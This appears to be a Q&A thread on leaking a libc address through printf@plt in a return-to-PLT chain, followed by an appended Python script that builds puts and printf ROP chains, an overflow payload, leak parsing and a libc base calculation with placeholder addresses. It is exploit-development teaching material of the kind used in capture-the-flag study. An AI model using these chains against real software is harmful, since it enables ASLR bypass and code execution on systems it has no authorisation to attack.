
I have a small binary compiled as non-PIE, but ASLR is enabled, so the shared libraries are randomized. My plan was to leak a libc address from the GOT by returning to the PLT, but the only useful PLT stub I have is printf. Previously I wrote a working exploit with this method when I could use puts, but in this case the only output I get after returning to printf@plt is an empty string.

I couldn't find the reason for this behavior so far; why does printf act like this? Is it even possible to leak an address this way?

awerv

1 Answer


Yes, I think it's possible to leak an address using printf. With puts you only need to pass one argument to the function, the string you want to write to stdout, and in the case of a buffer overflow, the address of the function you want to leak. With printf you also need to pass a format specifier. There's a write-up here that demonstrates exactly that.

game0ver
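The chain shape the answer describes, as an added example (not code from the question, the answer, or the linked write-up). It assumes an x86-64 non-PIE target: with puts only rdi has to be loaded, while with printf rdi must point at a "%s" string and the GOT slot goes in rsi, so a second gadget is needed. Every address, the gadget list, the overflow distance and the libc offset are hypothetical placeholders; take the real ones from the target binary and its libc. The leak parser handles the two details that commonly produce a "wrong" address: a user-space x86-64 pointer is 0x00007f..., so puts and %s stop after six bytes, and a 0x0a byte inside the address must not be mistaken for the newline puts appends.

```python
import struct

# Hypothetical addresses for a non-PIE x86-64 target (all constructed for this
# example; read the real ones with objdump, ROPgadget or pwntools).
POP_RDI_RET     = 0x4012a3   # gadget: pop rdi ; ret
POP_RSI_R15_RET = 0x4012a1   # gadget: pop rsi ; pop r15 ; ret
RET             = 0x40101a   # gadget: ret (stack-alignment pad)
PUTS_PLT        = 0x401030   # puts@plt
PRINTF_PLT      = 0x401040   # printf@plt
PUTS_GOT        = 0x404018   # GOT slot holding libc's puts once resolved
FMT_S           = 0x402004   # a "%s\0" string in .rodata (search the binary)
MAIN            = 0x401156   # return into main so a second stage can be sent
BUF_TO_RET      = 40         # overflow distance from buffer to saved rip
LIBC_PUTS_OFF   = 0x80a60    # offset of puts in the target's libc (hypothetical)


def p64(value):
    return struct.pack("<Q", value)


def chain_puts(got_slot=PUTS_GOT):
    """puts(got_slot): one pointer argument, so only rdi must be loaded."""
    return b"".join([
        p64(POP_RDI_RET), p64(got_slot),
        p64(PUTS_PLT),
        p64(MAIN),
    ])


def chain_printf(got_slot=PUTS_GOT, fmt=FMT_S):
    """printf("%s", got_slot): rdi = format string, rsi = pointer to print.
    The "%s" makes printf dereference its second argument; handing it the GOT
    address alone would make that address the format string instead."""
    return b"".join([
        p64(POP_RDI_RET), p64(fmt),
        p64(POP_RSI_R15_RET), p64(got_slot), p64(0),   # r15 receives junk
        p64(RET),            # keeps rsp 16-byte aligned at printf entry; drop it
                             # if the chain is already aligned (check in gdb:
                             # a misaligned printf crashes in a movaps)
        p64(PRINTF_PLT),
        p64(MAIN),
    ])


def payload(chain):
    """Overflow filler followed by the ROP chain."""
    return b"A" * BUF_TO_RET + chain


def parse_leak(output):
    """Recover the pointer from leaked bytes. puts and %s both stop at the
    first NUL; a user-space x86-64 address is 0x00007f..., so exactly six
    bytes arrive and the two high bytes have to be restored. Never split the
    output on newline: 0x0a can legitimately occur inside the address."""
    raw = output[:6]
    if len(raw) < 6:
        raise ValueError("short leak: %r" % output)
    return struct.unpack("<Q", raw.ljust(8, b"\0"))[0]


def libc_base(leaked_puts, puts_offset=LIBC_PUTS_OFF):
    """Rebase: libc is page aligned, so a misaligned result means the offset
    (wrong libc build) or the leak itself is off."""
    base = leaked_puts - puts_offset
    if base & 0xfff:
        raise ValueError("libc base 0x%x is not page aligned" % base)
    return base


if __name__ == "__main__":
    # Constructed output of puts(PUTS_GOT) for a pretend libc puts at
    # 0x7ffff7e50a60: six address bytes (one of them 0x0a) plus puts' newline.
    sample = b"\x60\x0a\xe5\xf7\xff\x7f\n"
    leaked = parse_leak(sample)
    print("puts@libc  = 0x%x" % leaked)
    print("libc base  = 0x%x" % libc_base(leaked))
    print("printf chain:", payload(chain_printf()).hex())
```

On i386 the same two calls need no gadgets at all: the return address is followed directly by the arguments on the stack, so the printf variant is just printf@plt, return address, pointer to "%s", pointer to the GOT slot. Whichever architecture, read the leaked bytes as raw binary from the socket or pipe rather than as text, and only then compute the libc base.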